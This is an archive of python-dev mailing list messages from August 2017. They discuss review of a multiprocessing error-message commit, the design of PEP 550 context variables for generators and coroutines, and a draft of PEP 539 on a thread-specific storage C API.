multiprocessing/util.py > > > > * Most asserts in multiprocessing more informative > > > > * Didn't save right version > > > > * Further work on multiprocessing error messages > > > > * Correct typo > > > > * Correct typo v2 > > > > * Blasted colon... serves me right for trying to work on two things at once > > > > * Simplify NEWS entry > > > > * Update 2017-08-18-17-16-38.bpo-5001.gwnthq.rst > > > > * Update 2017-08-18-17-16-38.bpo-5001.gwnthq.rst > > > > OK, never mind. > > > > * Corrected (thanks to pitrou) error messages for notify > > > > * Remove extraneous backslash in docstring. > > Please, please don't forget to edit commit messages before merging. An > excessively verbose commit message will be kept in the repository > forever and will harm future developers that read a history. Sorry, I routinely forget about it. Can we have an automated check for this? Regards Antoine. From ncoghlan at gmail.com Wed Aug 30 05:48:14 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 30 Aug 2017 19:48:14 +1000 Subject: [Python-Dev] bpo-5001: More-informative multiprocessing error messages (#3079) In-Reply-To: <20170830113931.6730f2c3@fsol> References: <3xhkRl6v1MzFqct@mail.python.org> <20170830113931.6730f2c3@fsol> Message-ID: On 30 August 2017 at 19:39, Antoine Pitrou wrote: > On Wed, 30 Aug 2017 08:48:56 +0300 > Serhiy Storchaka wrote: >> Please, please don't forget to edit commit messages before merging. An >> excessively verbose commit message will be kept in the repository >> forever and will harm future developers that read a history. 
>
> Sorry, I routinely forget about it. Can we have an automated check for
> this?

Not while we're pushing the "squash & merge" button directly, as
there's no opportunity for any automated hooks to run at that point :(

More options open up if the actual commit is being handled by a bot,
but even that would still depend on us providing an updated commit
message via some mechanism.

Cheers,
Nick.

--
Nick Coghlan   |   ncoghlan at gmail.com   |   Brisbane, Australia

From p.f.moore at gmail.com  Wed Aug 30 05:55:38 2017
From: p.f.moore at gmail.com (Paul Moore)
Date: Wed, 30 Aug 2017 10:55:38 +0100
Subject: [Python-Dev] bpo-5001: More-informative multiprocessing error messages (#3079)
In-Reply-To:
References: <3xhkRl6v1MzFqct@mail.python.org> <20170830113931.6730f2c3@fsol>
Message-ID:

On 30 August 2017 at 10:48, Nick Coghlan wrote:
> On 30 August 2017 at 19:39, Antoine Pitrou wrote:
>> On Wed, 30 Aug 2017 08:48:56 +0300
>> Serhiy Storchaka wrote:
>>> Please, please don't forget to edit commit messages before merging. An
>>> excessively verbose commit message will be kept in the repository
>>> forever and will harm future developers that read a history.
>>
>> Sorry, I routinely forget about it. Can we have an automated check for
>> this?
>
> Not while we're pushing the "squash & merge" button directly, as
> there's no opportunity for any automated hooks to run at that point :(
>
> More options open up if the actual commit is being handled by a bot,
> but even that would still depend on us providing an updated commit
> message via some mechanism.

We could have a check for PRs that contain multiple commits. The check
would flag that the commit message needs manual editing before
merging, and would act as a prompt for submitters who are willing to
do so to squash their PRs themselves. Personally, I'd prefer that as,
apart from admin activities like making sure the PR and issue number
references are present and correct, I think the original submitter has
a better chance of properly summarising the PR in the merged commit
message anyway.

Paul
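To sketch what such a multiple-commit check might look like (a hypothetical
helper only, not an actual CPython workflow tool; it assumes the third-party
requests package and GitHub's REST API):

    import requests

    def pr_needs_squash_note(owner, repo, number, token):
        """Return True if the pull request carries more than one commit,
        i.e. the squash-merged commit message will need manual editing."""
        url = 'https://api.github.com/repos/%s/%s/pulls/%d' % (
            owner, repo, number)
        resp = requests.get(url,
                            headers={'Authorization': 'token ' + token})
        resp.raise_for_status()
        # The pull request payload includes a "commits" count.
        return resp.json()['commits'] > 1

    # A bot could post a reminder comment whenever this returns True, e.g.:
    # if pr_needs_squash_note('python', 'cpython', 3079, token): ...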
From chris.jerdonek at gmail.com  Wed Aug 30 06:16:42 2017
From: chris.jerdonek at gmail.com (Chris Jerdonek)
Date: Wed, 30 Aug 2017 03:16:42 -0700
Subject: [Python-Dev] [Python-checkins] bpo-5001: More-informative multiprocessing error messages (#3079)
In-Reply-To: <3xhkRc3H00zFrZN@mail.python.org>
References: <3xhkRc3H00zFrZN@mail.python.org>
Message-ID:

https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c
> commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c
> branch: master
> author: Allen W. Smith, Ph.D
> committer: Antoine Pitrou
> date: 2017-08-30T00:52:18+02:00
> summary:
>
> ...
> @@ -307,6 +309,10 @@ def imap(self, func, iterable, chunksize=1):
> ))
> return result
> else:
> + if chunksize < 1:
> + raise ValueError(
> + "Chunksize must be 1+, not {0:n}".format(
> + chunksize))
> assert chunksize > 1

It looks like removing this assert statement was missed.

--Chris

> task_batches = Pool._get_tasks(func, iterable, chunksize)
> result = IMapIterator(self._cache)
> @@ -334,7 +340,9 @@ def imap_unordered(self, func, iterable, chunksize=1):
> ))
> return result
> else:
> - assert chunksize > 1
> + if chunksize < 1:
> + raise ValueError(
> + "Chunksize must be 1+, not {0!r}".format(chunksize))
> task_batches = Pool._get_tasks(func, iterable, chunksize)
> result = IMapUnorderedIterator(self._cache)
> self._taskqueue.put(

From chris.jerdonek at gmail.com  Wed Aug 30 06:21:42 2017
From: chris.jerdonek at gmail.com (Chris Jerdonek)
Date: Wed, 30 Aug 2017 03:21:42 -0700
Subject: [Python-Dev] [Python-checkins] bpo-5001: More-informative multiprocessing error messages (#3079)
In-Reply-To: <3xhkRc3H00zFrZN@mail.python.org>
References: <3xhkRc3H00zFrZN@mail.python.org>
Message-ID:

> https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c
> commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c
> branch: master
> author: Allen W. Smith, Ph.D
> committer: Antoine Pitrou
> date: 2017-08-30T00:52:18+02:00
> summary:
>
> bpo-5001: More-informative multiprocessing error messages (#3079)
> ...
> @@ -254,8 +256,8 @@ def _setup_queues(self):
> def apply(self, func, args=(), kwds={}):
> '''
> Equivalent of `func(*args, **kwds)`.
> + Pool must be running.
> '''
> - assert self._state == RUN

Also, this wasn't replaced with anything.

--Chris

> return self.apply_async(func, args, kwds).get()
>
> def map(self, func, iterable, chunksize=None):
> @@ -307,6 +309,10 @@ def imap(self, func, iterable, chunksize=1):

From k7hoven at gmail.com  Wed Aug 30 08:19:16 2017
From: k7hoven at gmail.com (Koos Zevenhoven)
Date: Wed, 30 Aug 2017 15:19:16 +0300
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: <59A5FA89.1000001@canterbury.ac.nz>
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz>
Message-ID:

On Wed, Aug 30, 2017 at 2:36 AM, Greg Ewing wrote:
> Yury Selivanov wrote:
>> While we want "yield from" to have semantics close to a function call,
>
> That's not what I said! I said that "yield from foo()" should
> have semantics close to a function call. If you separate the
> "yield from" from the "foo()", then of course you can get
> different behaviours.
>
> But that's beside the point, because I'm not suggesting
> that generators should behave differently depending on when
> or if you use "yield from" on them.
>
>> For (1) we want the context change to be isolated. For (2) you say
>> that the context change should propagate to the caller.
>
> No, I'm saying that the context change should *always*
> propagate to the caller, unless you do something explicit
> within the generator to prevent it.
>
> I have some ideas on what that something might be, which
> I'll post later.

FYI, I've been sketching an alternative solution that addresses these
kinds of things. I've been hesitant to post about it, partly because of
the PEP550-based workarounds that Nick, Nathaniel, Yury etc. have been
describing, and partly because that might be a major distraction from
other useful discussions, especially because I wasn't completely sure
yet about whether my approach has some fatal flaw compared to PEP 550 ;).

Koos

--
+ Koos Zevenhoven + http://twitter.com/k7hoven +
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From greg.ewing at canterbury.ac.nz  Wed Aug 30 08:55:43 2017
From: greg.ewing at canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 Aug 2017 00:55:43 +1200
Subject: [Python-Dev] PEP 550 v4
In-Reply-To:
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz>
Message-ID: <59A6B5CF.4070902@canterbury.ac.nz>

Yury Selivanov wrote:
> BTW we already have mechanisms to always propagate context to the
> caller -- just use threading.local() or a global variable.

But then you don't have a way to *not* propagate the
context change when you don't want to.

Here's my suggestion: Make an explicit distinction between
creating a new binding for a context var and updating an
existing one.

So instead of two API calls there would be three:

    contextvar.new(value)   # Creates a new binding only
                            # visible to this frame and
                            # its callees

    contextvar.set(value)   # Updates existing binding in
                            # context inherited from caller

    contextvar.get()        # Retrieves the current binding

If we assume an extension to the decimal module so
that decimal.localcontext is a context var, we can
now do this:

    async def foo():
        # Establish a new context for this task
        decimal.localcontext.new(decimal.Context())
        # Delegate changing the context
        await bar()
        # Do some calculations
        yield 17 * math.pi + 42

    async def bar():
        # Change context for caller
        decimal.localcontext.prec = 5

--
Greg

From yselivanov.ml at gmail.com  Wed Aug 30 09:55:59 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Wed, 30 Aug 2017 09:55:59 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: <59A6B5CF.4070902@canterbury.ac.nz>
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz> <59A6B5CF.4070902@canterbury.ac.nz>
Message-ID:

On Wed, Aug 30, 2017 at 8:55 AM, Greg Ewing wrote:
> Yury Selivanov wrote:
>
>> BTW we already have mechanisms to always propagate context to the
>> caller -- just use threading.local() or a global variable.
>
> But then you don't have a way to *not* propagate the
> context change when you don't want to.
>
> Here's my suggestion: Make an explicit distinction between
> creating a new binding for a context var and updating an
> existing one.
>
> So instead of two API calls there would be three:
>
>     contextvar.new(value)   # Creates a new binding only
>                             # visible to this frame and
>                             # its callees
>
>     contextvar.set(value)   # Updates existing binding in
>                             # context inherited from caller
>
>     contextvar.get()        # Retrieves the current binding
>
> If we assume an extension to the decimal module so
> that decimal.localcontext is a context var, we can
> now do this:
>
>     async def foo():
>         # Establish a new context for this task
>         decimal.localcontext.new(decimal.Context())
>         # Delegate changing the context
>         await bar()
>         # Do some calculations
>         yield 17 * math.pi + 42
>
>     async def bar():
>         # Change context for caller
>         decimal.localcontext.prec = 5

Interesting. Question: how to write a context manager with
contextvar.new?

    var = new_context_var()

    class CM:
        def __enter__(self):
            var.new(42)

    with CM():
        print(var.get() or 'None')

My understanding is that the above code will print "None", because
"var.new()" makes 42 visible only to callees of __enter__.
But if I use "set()" in "CM.__enter__", presumably, it will traverse the stack of LCs to the very bottom and set "var=42" in in it. Right? If so, how can fix the example in PEP 550 Rationale: https://www.python.org/dev/peps/pep-0550/#rationale where we zip() the "fractions()" generator? With current PEP 550 semantics that's trivial: https://www.python.org/dev/peps/pep-0550/#generators Yury From solipsis at pitrou.net Wed Aug 30 10:32:22 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 30 Aug 2017 16:32:22 +0200 Subject: [Python-Dev] [Python-checkins] bpo-5001: More-informative multiprocessing error messages (#3079) References: <3xhkRc3H00zFrZN@mail.python.org> Message-ID: <20170830163222.67f882d2@fsol> On Wed, 30 Aug 2017 03:16:42 -0700 Chris Jerdonek wrote: > https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c > > commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c > > branch: master > > author: Allen W. Smith, Ph.D > > committer: Antoine Pitrou > > date: 2017-08-30T00:52:18+02:00 > > summary: > > > > ... > > @@ -307,6 +309,10 @@ def imap(self, func, iterable, chunksize=1): > > )) > > return result > > else: > > + if chunksize < 1: > > + raise ValueError( > > + "Chunksize must be 1+, not {0:n}".format( > > + chunksize)) > > assert chunksize > 1 > > It looks like removing this assert statement was missed. Good catch, thanks. Regards Antoine. From solipsis at pitrou.net Wed Aug 30 10:33:09 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 30 Aug 2017 16:33:09 +0200 Subject: [Python-Dev] [Python-checkins] bpo-5001: More-informative multiprocessing error messages (#3079) References: <3xhkRc3H00zFrZN@mail.python.org> Message-ID: <20170830163309.3b31f71e@fsol> On Wed, 30 Aug 2017 03:21:42 -0700 Chris Jerdonek wrote: > > https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c > > commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c > > branch: master > > author: Allen W. Smith, Ph.D > > committer: Antoine Pitrou > > date: 2017-08-30T00:52:18+02:00 > > summary: > > > > bpo-5001: More-informative multiprocessing error messages (#3079) > > ... > > @@ -254,8 +256,8 @@ def _setup_queues(self): > > def apply(self, func, args=(), kwds={}): > > ''' > > Equivalent of `func(*args, **kwds)`. > > + Pool must be running. > > ''' > > - assert self._state == RUN > > Also, this wasn't replaced with anything. The check is already in apply_async(), checking it here again is redundant. Regards Antoine. From yselivanov.ml at gmail.com Wed Aug 30 10:36:20 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Wed, 30 Aug 2017 10:36:20 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz> Message-ID: On Wed, Aug 30, 2017 at 9:44 AM, Yury Selivanov wrote: [..] >> FYI, I've been sketching an alternative solution that addresses these kinds >> of things. I've been hesitant to post about it, partly because of the >> PEP550-based workarounds that Nick, Nathaniel, Yury etc. have been >> describing, and partly because that might be a major distraction from other >> useful discussions, especially because I wasn't completely sure yet about >> whether my approach has some fatal flaw compared to PEP 550 ;). > > We'll never know until you post it. Go ahead. 
From solipsis at pitrou.net  Wed Aug 30 10:32:22 2017
From: solipsis at pitrou.net (Antoine Pitrou)
Date: Wed, 30 Aug 2017 16:32:22 +0200
Subject: [Python-Dev] [Python-checkins] bpo-5001: More-informative multiprocessing error messages (#3079)
References: <3xhkRc3H00zFrZN@mail.python.org>
Message-ID: <20170830163222.67f882d2@fsol>

On Wed, 30 Aug 2017 03:16:42 -0700
Chris Jerdonek wrote:
> https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c
> > commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c
> > branch: master
> > author: Allen W. Smith, Ph.D
> > committer: Antoine Pitrou
> > date: 2017-08-30T00:52:18+02:00
> > summary:
> >
> > ...
> > @@ -307,6 +309,10 @@ def imap(self, func, iterable, chunksize=1):
> > ))
> > return result
> > else:
> > + if chunksize < 1:
> > + raise ValueError(
> > + "Chunksize must be 1+, not {0:n}".format(
> > + chunksize))
> > assert chunksize > 1
>
> It looks like removing this assert statement was missed.

Good catch, thanks.

Regards

Antoine.

From solipsis at pitrou.net  Wed Aug 30 10:33:09 2017
From: solipsis at pitrou.net (Antoine Pitrou)
Date: Wed, 30 Aug 2017 16:33:09 +0200
Subject: [Python-Dev] [Python-checkins] bpo-5001: More-informative multiprocessing error messages (#3079)
References: <3xhkRc3H00zFrZN@mail.python.org>
Message-ID: <20170830163309.3b31f71e@fsol>

On Wed, 30 Aug 2017 03:21:42 -0700
Chris Jerdonek wrote:
> > https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c
> > commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c
> > branch: master
> > author: Allen W. Smith, Ph.D
> > committer: Antoine Pitrou
> > date: 2017-08-30T00:52:18+02:00
> > summary:
> >
> > bpo-5001: More-informative multiprocessing error messages (#3079)
> > ...
> > @@ -254,8 +256,8 @@ def _setup_queues(self):
> > def apply(self, func, args=(), kwds={}):
> > '''
> > Equivalent of `func(*args, **kwds)`.
> > + Pool must be running.
> > '''
> > - assert self._state == RUN
>
> Also, this wasn't replaced with anything.

The check is already in apply_async(), checking it here again is
redundant.

Regards

Antoine.

From yselivanov.ml at gmail.com  Wed Aug 30 10:36:20 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Wed, 30 Aug 2017 10:36:20 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To:
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz>
Message-ID:

On Wed, Aug 30, 2017 at 9:44 AM, Yury Selivanov wrote:
[..]
>> FYI, I've been sketching an alternative solution that addresses these kinds
>> of things. I've been hesitant to post about it, partly because of the
>> PEP550-based workarounds that Nick, Nathaniel, Yury etc. have been
>> describing, and partly because that might be a major distraction from other
>> useful discussions, especially because I wasn't completely sure yet about
>> whether my approach has some fatal flaw compared to PEP 550 ;).
>
> We'll never know until you post it. Go ahead.

The only alternative design that I considered for PEP 550 and
ultimately rejected was to have the following thread-specific
mapping:

    {
        var1: [stack of values for var1],
        var2: [stack of values for var2]
    }

So the idea is that when we set a value for the variable in some
frame, we push it to its stack. When the frame is done, we pop it.
This is a classic approach (called Shallow Binding) to implement
dynamic scope. The fatal flaw that made me reject this approach
was the CM protocol (__enter__). Specifically, context managers need
to be able to control values in outer frames, and this is where this
approach becomes super messy.

Yury
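To make the rejected design concrete, here is a minimal shallow-binding
sketch with hypothetical helper names (this is not the PEP 550 API): each
variable keeps a per-thread stack of values; set() pushes, and the runtime
-- simulated here by a decorator -- pops a frame's pushes when the frame
returns. The __enter__ problem then shows up immediately:

    import functools
    import threading

    _local = threading.local()   # per-thread {name: [stack of values]}

    def _stack(name):
        stacks = getattr(_local, 'stacks', None)
        if stacks is None:
            stacks = _local.stacks = {}
        return stacks.setdefault(name, [])

    class DynVar:
        """A dynamically scoped variable via shallow binding (sketch)."""
        def __init__(self, name):
            self.name = name
        def set(self, value):
            _stack(self.name).append(value)           # push a binding
        def get(self, default=None):
            stack = _stack(self.name)
            return stack[-1] if stack else default

    def autopop(fn):
        """Simulate the runtime popping a frame's pushes on return."""
        @functools.wraps(fn)
        def wrapper(*args, **kwds):
            before = {n: len(s)
                      for n, s in getattr(_local, 'stacks', {}).items()}
            try:
                return fn(*args, **kwds)
            finally:
                for name, stack in getattr(_local, 'stacks', {}).items():
                    del stack[before.get(name, 0):]   # frame done: pop
        return wrapper

    var = DynVar('var')

    class CM:
        @autopop
        def __enter__(self):
            var.set(42)   # pushed inside __enter__ ...
        def __exit__(self, *exc):
            return None

    with CM():
        print(var.get())  # ... but popped with the frame: prints None

The value a context manager sets in __enter__ disappears before the with
block even runs, which is the mess described above.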
From yselivanov.ml at gmail.com  Wed Aug 30 09:44:59 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Wed, 30 Aug 2017 09:44:59 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To:
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz>
Message-ID:

On Wed, Aug 30, 2017 at 8:19 AM, Koos Zevenhoven wrote:
> On Wed, Aug 30, 2017 at 2:36 AM, Greg Ewing
> wrote:
>> Yury Selivanov wrote:
>>> While we want "yield from" to have semantics close to a function call,
>>
>> That's not what I said! I said that "yield from foo()" should
>> have semantics close to a function call. If you separate the
>> "yield from" from the "foo()", then of course you can get
>> different behaviours.
>>
>> But that's beside the point, because I'm not suggesting
>> that generators should behave differently depending on when
>> or if you use "yield from" on them.
>>
>>> For (1) we want the context change to be isolated. For (2) you say
>>> that the context change should propagate to the caller.
>>
>> No, I'm saying that the context change should *always*
>> propagate to the caller, unless you do something explicit
>> within the generator to prevent it.
>>
>> I have some ideas on what that something might be, which
>> I'll post later.
>
> FYI, I've been sketching an alternative solution that addresses these kinds
> of things. I've been hesitant to post about it, partly because of the
> PEP550-based workarounds that Nick, Nathaniel, Yury etc. have been
> describing, and partly because that might be a major distraction from other
> useful discussions, especially because I wasn't completely sure yet about
> whether my approach has some fatal flaw compared to PEP 550 ;).

We'll never know until you post it. Go ahead.

Yury

From phd at phdru.name  Wed Aug 30 10:53:40 2017
From: phd at phdru.name (Oleg Broytman)
Date: Wed, 30 Aug 2017 16:53:40 +0200
Subject: [Python-Dev] [Python-checkins] bpo-5001: More-informative multiprocessing error messages (#3079)
In-Reply-To: <20170830163222.67f882d2@fsol>
References: <3xhkRc3H00zFrZN@mail.python.org> <20170830163222.67f882d2@fsol>
Message-ID: <20170830145340.GA9342@phdru.name>

Hi!

On Wed, Aug 30, 2017 at 04:32:22PM +0200, Antoine Pitrou wrote:
> On Wed, 30 Aug 2017 03:16:42 -0700
> Chris Jerdonek wrote:
> > https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c
> > > commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c
> > > branch: master
> > > author: Allen W. Smith, Ph.D
> > > committer: Antoine Pitrou
> > > date: 2017-08-30T00:52:18+02:00
> > > summary:
> > >
> > > ...
> > > @@ -307,6 +309,10 @@ def imap(self, func, iterable, chunksize=1):
> > > ))
> > > return result
> > > else:
> > > + if chunksize < 1:
> > > + raise ValueError(
> > > + "Chunksize must be 1+, not {0:n}".format(
> > > + chunksize))
> > > assert chunksize > 1

The error condition was changed from `<= 1` to `< 1` -- was it
intentional?

> Regards
> Antoine.

Oleg.
--
Oleg Broytman http://phdru.name/ phd at phdru.name
Programmers don't die, they just GOSUB without RETURN.

From yselivanov.ml at gmail.com  Wed Aug 30 13:54:28 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Wed, 30 Aug 2017 13:54:28 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To:
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz>
Message-ID:

On Wed, Aug 30, 2017 at 1:39 PM, Kevin Conway wrote:
>> Can Execution Context be implemented outside of CPython
>
> I know I'm well late to the game and a bit dense, but where in the pep is
> the justification for this assertion? I ask because we built something to
> solve the same problem in Twisted some time ago:
> https://bitbucket.org/hipchat/txlocal . We were able to leverage
> generator/coroutine decorators to preserve state without modifying the
> runtime.
>
> Given that this problem only exists in runtimes that multiplex coroutines
> on a single thread and the fact that coroutine execution engines only
> exist in user space, why doesn't it make more sense to leave this to a
> library that

To work with coroutines we have asyncio/twisted or other frameworks.
They create async tasks and manage them. Generators, OTOH, don't have
a framework that runs them, they are managed by the Python
interpreter. So it's not possible to implement a *complete context
solution* that equally supports generators and coroutines outside of
the interpreter.

Another problem is that every framework has its own local context
solution. Twisted has one, gevent has another. But libraries like
numpy and decimal can't use them to store their local context data,
because they are non-standard. That's why we need to solve this
problem once in Python directly.

Yury
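For concreteness, here is a rough sketch of the library-level approach
being discussed (in the spirit of the txlocal link above, but with
hypothetical names -- this is not txlocal's actual API): a wrapper runs
each resumption of a generator under that generator's own context copy.

    import functools
    import threading

    _ctx = threading.local()   # one library's private "context" dict

    def get_context():
        if not hasattr(_ctx, 'data'):
            _ctx.data = {}
        return _ctx.data

    def with_private_context(genfunc):
        """Resume each step of the generator under its own context."""
        @functools.wraps(genfunc)
        def wrapper(*args, **kwds):
            gen = genfunc(*args, **kwds)
            private = dict(get_context())    # snapshot at creation time
            def step():
                nonlocal private
                outer = get_context()
                _ctx.data = private          # switch to the generator's view
                try:
                    return next(gen)
                finally:
                    private = get_context()  # keep the generator's changes
                    _ctx.data = outer        # restore the caller's view
            while True:
                try:
                    value = step()
                except StopIteration:
                    return
                yield value
        return wrapper

The limitation is visible in the shape of the code: only generators that
are explicitly wrapped get the save/restore behaviour, and _ctx is private
to this one library, so standard modules like decimal or numpy have no
portable place to store their state -- which is the gap PEP 550 aims to
fill.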
From kevinjacobconway at gmail.com  Wed Aug 30 13:39:50 2017
From: kevinjacobconway at gmail.com (Kevin Conway)
Date: Wed, 30 Aug 2017 17:39:50 +0000
Subject: [Python-Dev] PEP 550 v4
In-Reply-To:
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz>
Message-ID:

> Can Execution Context be implemented outside of CPython

I know I'm well late to the game and a bit dense, but where in the pep is
the justification for this assertion? I ask because we built something to
solve the same problem in Twisted some time ago:
https://bitbucket.org/hipchat/txlocal . We were able to leverage
generator/coroutine decorators to preserve state without modifying the
runtime.

Given that this problem only exists in runtimes that multiplex coroutines
on a single thread and the fact that coroutine execution engines only
exist in user space, why doesn't it make more sense to leave this to a
library that engines like asyncio and Twisted are responsible for
standardising on?

On Wed, Aug 30, 2017, 09:40 Yury Selivanov wrote:
> On Wed, Aug 30, 2017 at 9:44 AM, Yury Selivanov
> wrote:
> [..]
> >> FYI, I've been sketching an alternative solution that addresses these
> >> kinds of things. I've been hesitant to post about it, partly because
> >> of the PEP550-based workarounds that Nick, Nathaniel, Yury etc. have
> >> been describing, and partly because that might be a major distraction
> >> from other useful discussions, especially because I wasn't completely
> >> sure yet about whether my approach has some fatal flaw compared to
> >> PEP 550 ;).
> >
> > We'll never know until you post it. Go ahead.
>
> The only alternative design that I considered for PEP 550 and
> ultimately rejected was to have the following thread-specific
> mapping:
>
>     {
>         var1: [stack of values for var1],
>         var2: [stack of values for var2]
>     }
>
> So the idea is that when we set a value for the variable in some
> frame, we push it to its stack. When the frame is done, we pop it.
> This is a classic approach (called Shallow Binding) to implement
> dynamic scope. The fatal flaw that made me reject this approach
> was the CM protocol (__enter__). Specifically, context managers need
> to be able to control values in outer frames, and this is where this
> approach becomes super messy.
>
> Yury
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> https://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe:
> https://mail.python.org/mailman/options/python-dev/kevinjacobconway%40gmail.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From ma3yuki.8mamo10 at gmail.com  Thu Aug 31 04:16:59 2017
From: ma3yuki.8mamo10 at gmail.com (Masayuki YAMAMOTO)
Date: Thu, 31 Aug 2017 17:16:59 +0900
Subject: [Python-Dev] PEP 539 (second round): A new C API for Thread-Local Storage in CPython
Message-ID:

Hi python-dev,

Since Erik started the PEP 539 thread on python-ideas, I've collected
feedback from the discussion and the pull request, and worked on improving
the API specification and reference implementation; as a result, I think
the issues that were pointed out have been resolved.

Well, it's probably not finished yet; there is one thing which bothers me.
I'm not sure about the CPython startup sequence design (PEP 432,
Restructuring the CPython startup sequence; it might conflict with the
draft specification [1]), so please let me know what you think about the
new API specification. In any case, I'm starting a new thread for the
updated draft.

Summary of technical changes:

- The two functions which correspond to PyThread_delete_key_value and
  PyThread_ReInitTLS are omitted, because they existed only for CPython's
  own TLS implementation, which has been removed.
- Add an internal field "_is_initialized" and a constant default value
  "Py_tss_NEEDS_INIT" to the Py_tss_t type, to indicate the thread key's
  initialization state independently of the underlying implementation.
- Then, define the behaviors of the functions which use the
  "_is_initialized" field.
- Change the key argument to be passed as a pointer, allowing use in the
  limited API, where the key type's size is not known.
- Add three functions for dynamic (de-)allocation and for checking the
  key's initialization state, since the struct is handled as opaque.
- Change platform support: when thread support is enabled, all platforms
  are required to provide at least one native thread implementation.

The draft has also gained explanations and rationales for the above
changes, plus additional annotations for information.
Regards,
Masayuki

[1]: The specifications of thread key creation and deletion refer to how
they are used by the API's clients (Modules/_tracemalloc.c and
Python/pystate.c). One of those callers, the Py_Initialize function, from
which the PyThread_tss_create calls originate, followed the flow "no-op
when called for a second time" up to CPython 3.6 [2]. However,
_Py_InitializeCore, an internal function newly added on the current master
branch, follows the flow "fatal error when called for a second time" [3].

[2]: https://docs.python.org/3.6/c-api/init.html#c.Py_Initialize
[3]: https://github.com/python/cpython/blob/master/Python/pylifecycle.c#L508

First round for PEP 539:
https://mail.python.org/pipermail/python-ideas/2016-December/043983.html
Discussion for the issue: https://bugs.python.org/issue25658
HTML version for PEP 539 draft: https://www.python.org/dev/peps/pep-0539/
Diff between first round and second round:
https://gist.github.com/ma8ma/624f9e4435ebdb26230130b11ce12d20/revisions
And the pull-request for reference implementation (work in progress):
https://github.com/python/cpython/pull/1362

========================================

PEP: 539
Title: A New C-API for Thread-Local Storage in CPython
Version: $Revision$
Last-Modified: $Date$
Author: Erik M. Bray, Masayuki Yamamoto
BDFL-Delegate: Nick Coghlan
Status: Draft
Type: Informational
Content-Type: text/x-rst
Created: 20-Dec-2016
Post-History: 16-Dec-2016

Abstract
========

The proposal is to add a new Thread Local Storage (TLS) API to CPython
which would supersede use of the existing TLS API within the CPython
interpreter, while deprecating the existing API. The new API is named
"Thread Specific Storage (TSS) API" (see `Rationale for Proposed
Solution`_ for the origin of the name).

Because the existing TLS API is only used internally (it is not mentioned
in the documentation, and the header that defines it, ``pythread.h``, is
not included in ``Python.h`` either directly or indirectly), this proposal
probably only affects CPython, but might also affect other interpreter
implementations (PyPy?) that implement parts of the CPython API.

This is motivated primarily by the fact that the old API uses ``int`` to
represent TLS keys across all platforms, which is neither POSIX-compliant,
nor portable in any practical sense [1]_.

.. note::

   Throughout this document the acronym "TLS" refers to Thread Local
   Storage and should not be confused with the "Transport Layer Security"
   protocols.

Specification
=============

The current API for TLS used inside the CPython interpreter consists of 6
functions::

